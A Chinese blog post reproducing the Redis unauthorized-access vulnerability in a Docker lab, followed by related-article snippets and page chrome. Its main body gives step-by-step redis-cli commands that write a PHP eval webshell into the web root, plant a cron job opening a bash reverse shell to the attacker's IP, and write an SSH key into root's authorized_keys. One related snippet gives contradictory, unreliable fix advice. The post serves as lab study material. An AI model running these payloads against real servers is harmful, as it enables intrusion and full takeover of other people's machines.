Redis未授权访问漏洞引出的漏洞利用方式

已于 2022-11-30 15:50:59 修改
阅读量1k 收藏 3
点赞数
文章标签: redis 数据库 安全
于 2022-11-20 17:25:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chu_jian_xiong/article/details/127950118
版权

Redis未授权访问漏洞引出的漏洞利用方式

redis未授权访问漏洞的成因和危害

漏洞定义

redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。

漏洞成因

  1. redis版本为4.x/5.0.5或以前的版本;
  2. redis绑定在0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;
  3. 没有设置密码认证,可以免密码远程登录redis服务

漏洞危害

  1. 攻击者可通过redis命令向网站目录写入webshell,完成对目标网站服务器的初步控制;(/var/ww/html)
  2. 攻击者可以通过redis命令向目标服务器写入计划任务来反弹shell,完成服务器的控制;(/var/spool/cron/)
    任务计划反弹shell方法仅适用于Centos
    Ubuntu 不能用的原因如下:
    因为默认 redis 写文件后是 644 权限,但是 Ubuntu 要求执行定时任务文件 /var/spool/cron/crontabs/<username> 权限必须是 600 才会执行,否则会报错 (root) INSECURE MODE (mode 0600 expected),而 Centos 的定时任务文件 /var/spool/cron/<username> 权限 644 也可以执行
  3. 最严重的情况,如果redis以root身份运行,攻击者可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。(/root/.ssh)

操作演示

由于我的系统是Ubuntu,并且环境是用docker搭建的,下面我只演示写webshell的部分。

环境搭建

靶机:Ubuntu + LAMP + redis-5.0.4(172.16.70.129)
攻击机:kali(172.16.70.140)

# 搭建redis5.0.4,同时设置挂载卷和端口映射,如果不做定时任务和公钥的实验则不需要(-v /var/spool/cron:/var/spool/cron -v /root/.ssh:/root/.ssh)
docker run --name=redis-5 -dit -v /var/www/html:/var/www/html -v /var/spool/cron:/var/spool/cron -v /root/.ssh:/root/.ssh -p 6379:6379 redis:5.0.4
# 搭建LAMP,这里我随便选了个镜像,同样做好挂载卷和端口映射并让容器在启动时执行(./run.sh)命令
docker run --name=lamp -dit -v /var/www/html:/var/www/html -p 80:80 -p 3306:3306 mattrayner/lamp /bin/bash -c "./run.sh"
# 如果需要对redis进行操作,装个redis-tools就行了
apt install redis-tools

环境搭建

redis未授权

# 在redis-5.0.5以下的版本,安装成功后默认情况下可以直接进行访问
redis-cli -h 172.16.70.129

redis未授权

通过redis未授权写入webshell

# 连接
redis-cli -h 172.16.70.129
# 设置存储路径
config set dir /var/www/html
# 设置存储文件名
config set dbfilename shell.php
# 创建记录  [shell => "\n\n<?php @eval($_REQUEST['cmd']);?>\n\n"]
set shell "\n\n<?php @eval($_REQUEST['cmd']);?>\n\n"
# 保存到磁盘		保存时可能会报错,原因是/var/www/html没有写入权限
# chmod 777 /var/www/html 一下就好了
save

写入webshell

通过redis未授权写入计划任务反弹shell

# 在攻击机上监听某端口
nc -lvnp 4444
# 连接靶机redis
redis-cli -h 172.16.70.129
# 设置存储路径
config set dir /var/spool/cron/
# 设置存储文件名
config set dbfilename root
# 创建记录
set xx "\n\n* * * * * bash -i >& /dev/tcp/172.16.70.140/4444 0>&1\n\n"
# 保存到磁盘
save

通过redis未授权实现ssh-keygen 公钥登录服务器

# 在攻击机上创建公钥文件
ssh-keygen -t rsa
# 重新生成一个key文件用于写入redis
(echo -e "\n\n";cat /home/kali/.ssh/id_rsa.pub;echo -e "\n\n") > key
# 将重新设置的文件写入redis,键名是key,值内为公钥
cat key | redis-cli -h 172.16.70.129 -x set key
# 设置存储路径(如果设置失败,说明redis不是root权限)
config set dir /root/.ssh/
# 设置存储文件名(公钥存放在/root/.ssh/authorized_keys可以实现ssh免密登录)
config set dbfilename authorized_keys
# 保存到磁盘
save

生成公钥

参考资料

[1]: Docker 入门指南:如何在 Ubuntu 上安装和使用 Docker
[2]: Redis攻防(未授权访问、利用redis写入webshell、任务计划反弹、Shellssh-keygen 公钥登录服务器、利用主从复制RCE)
[3]: edis问题缓存无法写入到本地磁盘

suppose18
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Redis常见漏洞利用方法总结1
08-03
Redis(Remote Dictionary Server ),即远程字典服务,是个开源的使 ANSI C 语编写、持络、可基于内存亦可持久化的志型、Key-
redis保护模式的报错
sudsahdua的博客
10-18 660
1.首先得保证redis实在gcc环境下运行的 2.如果发现命令行中只能打印出大写在符号,那么长安【A】就好,或者shift+[A]试试 3.mini安装Linux发现连不了网,要在配置文件中启动网关,并且设置自动分配IP地址,如果手动配置IP地址的话开门,可能还是连不上 4.java连接Redis出现错误, --------(错误原因:1>Linux防火墙默认是开启的 2>Redis默认是保护模式(绑定到127.0.0.1)) 解决方法: 关闭防火墙同时关闭Redis的保护模式 按照java的
Redis授权访问漏洞
Forget_liu的博客
04-05 648
​ 传统数据库都是持久化存储到硬盘中,所以执行某些业务时传统数据库并不是很理想。redis等数据存储在内存中的数据库就应允而生了。基于内存的Redis读速度是110000次/s,写速度是81000次/s。但是基于内存的缺点就是断电即失,如果服务器产生了意外,内存中的数据就会全部丢失,企业使用redis就冒着很大的风险。所以redis支持持久化存储(rbd与aof),在满足一定条件的情况下会自动保存到硬盘或者通过命令手动保存到硬盘。
Redis授权访问漏洞详解(全面)
最新发布
m0_64481831的博客
02-26 1325
Redis是一款内存高速缓存的数据库,是一款K-V型数据库,它的所有键值都是用字典来存储的。其中它的value支持多种数据类型,包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问,就会将Redis服务暴露在公网上;并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下授权访问Redis以及读取Redis数据。
redis授权访问漏洞
热门推荐
jiji_king的博客
07-07 1万+
个人笔记
redis 授权访问漏洞
weixin_60719780的博客
03-02 2066
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Redis授权访问
m0_67393342的博客
08-24 1824
漏洞复现的过程磕磕绊绊,但还是坚持了下来,并且收获甚大。中正如学习之路一样,即使再艰难也要坚持学习,解决问题的方法不止一个,此法不行另寻他法。
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 4130
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 4569
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
Redis授权访问漏洞复现与利用
Forget_liu的博客
06-07 2306
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
Redis授权访问漏洞(一)先导篇
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-09 1415
Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上。如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis以及读取Redis的数据。
授权访问漏洞-Redis授权访问漏洞
HAKUNAMATATATTA的博客
11-29 2948
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导 致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。Redis 是完全开源免费的,一个灵活的高性能 key-value 数据结构存储,可以用来作为数据库、缓存和消息队列。
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1778
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
redis授权访问漏洞利用
weixin_53562844的博客
05-07 2136
redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APL,reids默认端口是6379。造成授权漏洞的原因是安全配置作限制,redis默认情况是空密码连接。 利用条件:redis <3.2 利用原理:redis绑定在0.0.0.0:6379,且没有进行添加安全策略,直接暴露在公网,默认是空密码,可以让攻击者免密码登录redis服务。 靶机:192.
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4454
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
redis授权访问漏洞修复
11-03
为修复Redis授权访问漏洞,可以采取以下措施: ``` 代码块1: 1. 修改redis.conf配置文件,将bind 127.0.0.1改为bind 0.0.0.0,这样Redis只会监听本机的IP地址,而不是所有的IP地址。 2. 设置Redis密码,可以在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值